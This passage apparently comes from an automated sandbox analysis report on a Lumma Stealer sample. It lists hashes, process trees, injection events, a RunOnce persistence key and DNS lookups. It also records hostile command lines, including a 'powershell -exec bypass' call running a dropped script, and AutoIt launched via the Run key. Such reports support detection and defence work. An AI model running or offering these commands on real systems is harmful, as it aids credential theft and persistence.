SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3248-49-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/3248-50-0x0000000005F10000-0x0000000005F2E000-memory.dmp

memory/3248-51-0x0000000005FC0000-0x000000000600C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1

MD5 a93ef812fcdf3af24ff8b33a75d4992e
SHA1 b282892bd321a8709474f43d790d7e661edaa98f
SHA256 d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

memory/3248-53-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/3248-54-0x0000000006460000-0x000000000647A000-memory.dmp

memory/3248-55-0x00000000748BE000-0x00000000748BF000-memory.dmp

memory/3248-56-0x00000000748B0000-0x0000000075060000-memory.dmp

memory/4688-57-0x00000000003D0000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Roaming\RDJUYV.pif

MD5 3f58a517f1f4796225137e7659ad2adb
SHA1 e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA256 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512 acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

C:\Users\Admin\AppData\Roaming\79AFBM.xlsx

MD5 3c6d0866e54ab391bc09713fde4c9d38
SHA1 a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256 ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512 eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4

memory/4012-67-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-68-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-71-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-70-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-69-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-82-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/3260-83-0x0000000007550000-0x00000000075E6000-memory.dmp

memory/3260-84-0x0000000007520000-0x0000000007542000-memory.dmp

memory/3260-85-0x0000000007BA0000-0x0000000008144000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5315900105942deb090a358a315b06fe
SHA1 22fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256 e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA512 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

memory/3248-91-0x00000000748B0000-0x0000000075060000-memory.dmp

memory/4012-92-0x0000000000400000-0x00000000009BA000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

153s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 3388 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4900 wrote to memory of 3388 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4900 wrote to memory of 3388 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

141s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4848 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4848 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4848 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

134s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2308 set thread context of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2772 wrote to memory of 2928 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 2772 N/A C:\Windows\SysWOW64\more.com C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2772 wrote to memory of 2340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 632 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2340 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Set-up.exe

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1"

C:\Users\Admin\AppData\Roaming\9A2VOZ.pif

"C:\Users\Admin\AppData\Roaming\9A2VOZ.pif" "C:\Users\Admin\AppData\Roaming\N67EEG.xlsx"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

